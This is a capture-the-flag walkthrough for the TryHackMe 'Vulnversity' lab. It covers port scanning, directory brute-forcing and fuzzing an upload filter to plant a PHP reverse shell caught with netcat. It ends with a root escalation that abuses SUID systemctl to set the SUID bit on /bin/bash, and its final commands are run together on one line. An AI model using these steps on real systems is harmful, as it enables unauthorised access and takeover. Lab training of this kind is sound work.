This is the write up for the room Vulnversity on Tryhackme and it is part of the complete beginners path
Make connection with VPN or use the attackbox on Tryhackme site to connect to the Tryhackme lab environment.
Tasks Vulnversity
Task 1
Deploy the machine attached to the task and press complete
Task 2
Before reading start scanning the box by typing in the following command
nmap -sV -sC <machines ip>
2.1 There are many nmap “cheatsheets” online that you can use too.
Press complete
2.2 Scan the box, how many ports are open?
Answer 6
2.3 What version of the squid proxy is running on the machine?
We can find this in the results of the nmap scan
Answer 3.5.12
2.4 How many ports will nmap scan if the flag -p-400 was used?
You can find the answer in the man pages. Easies to find it type in
man nmap| less +/-p-
More infomation about nmap can als be found in the nmap room
Answer 400
2.5 Using the nmap flag -n what will it not resolve?
Answer DNS
2.6 What is the most likely operating system this machine is running?
It is already revealed during the nmap scan
Answer Ubuntu
2.7 What port is the web server running on?
We can find it in the nmap scan
Answer 3333
Task 3
3.1 What is the directory that has an upload form page?
First type in the command ( Do not copy it. Type it in yourself, for some reason sometimes with gobuster copy/past does break gobuster command )
gobuster dir -u http://<ip>:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
If you want to use a gui interfacte then type in
dirbuster&
We find an odd one name internal. Navigating to this reveals an page
Answer: internal
Task 4
4.1 Try upload a few file types to the server, what common extension seems to be blocked?
Try to uploading a php file will be blocked. We are getting an error Extension not allowed
Answer .php
4.2 To identify which extensions are not blocked, we’re going to fuzz the upload form.
If you do not know what Burpsuite is and can do then please take a look at these write ups
Start Burpsuite and press complete
4.3 Run this attack, what extension is allowed?
Make a file with the extensions stated in the task
nano phpext.txt
Put in the following extensions inside the file and save it
.php
.php3
.php4
.php5
.phtml
In firefox turn on FoxyProxy for burpsuite
If you do not know what this is and how to configure then please read this blog Configure Burpsuite with Firefox
refresh the site and turn on intercept in Burpsuite. Ten upload a file and see what happend in burpsuite
Now right click and send to intruder
Now navigate to intruder and change the positions as in the screenshot
Now navigate to the payload tab and import the created list
All the way to the bottom turn off URL encode
Now press the attack button
Notice the different in Length
Answer: .phtml
Now turn off the proxy intercept
4.4 What is the name of the user who manages the webserver?
We are not going to download the webshel as kali provides it unser /usr/share/webshells/php
Now copy this file to you document directory. Please do not edit this file.
cp /usr/share/webshells/php/php-reverse-shell.php ~/Documents/webshell.php
now edit the file with
nano webshell.php
After you put in your own IP save the file
Start a listener in a new terminal by entering the following command
nc -lvpn 1234
Now rename the file webshell.php to webshell.phtml and upload the file
now navigate to
http://<ip>:3333/internal/uploads/webshell.phtml
type in the following command to get a better return
python -c 'import pty; pty.spawn("/bin/bash")'4.5 What is the name of the user who manages the webserver?
navigate to the user directory
Answer: bill
4.6 What is the user flag?
cat the user.txt in the directory of bill. The output is the answer of the question
Task 5
5.1 On the system, search for all SUID files. What file stands out?
Type in the following command to find all SUID files
find / -perm -u=s -type f 2>/dev/null
Answer /bin/systemctl
5.2 Become root and get the last flag (/root/root.txt)
Take a look at systemctl | GTFOBins
Type in the following line by line
TF2=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/root.txt"
[Install]
WantedBy=multi-user.target' > $TF2
/bin/systemctl link $TF2
/bin/systemctl enable --now $TF2
Now cat root.txt
We did not became root we just use this to get the file we wanted.
I tried using a netcat connection but it did not work for me. You can change anything in this line to get what you want
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/root.txt"
Now how do we become root.
Why not start a shell as root Within this shell
ExecStart=/bin/sh -c "chmod +s /bin/bash"TF2=$(mktemp).service echo '[Service] Type=oneshot ExecStart=/bin/sh -c "chmod +s /bin/bash" [Install] WantedBy=multi-user.target' > $TF2 /bin/systemctl link $TF2 /bin/systemctl enable --now $TF2 /bin/bash -p
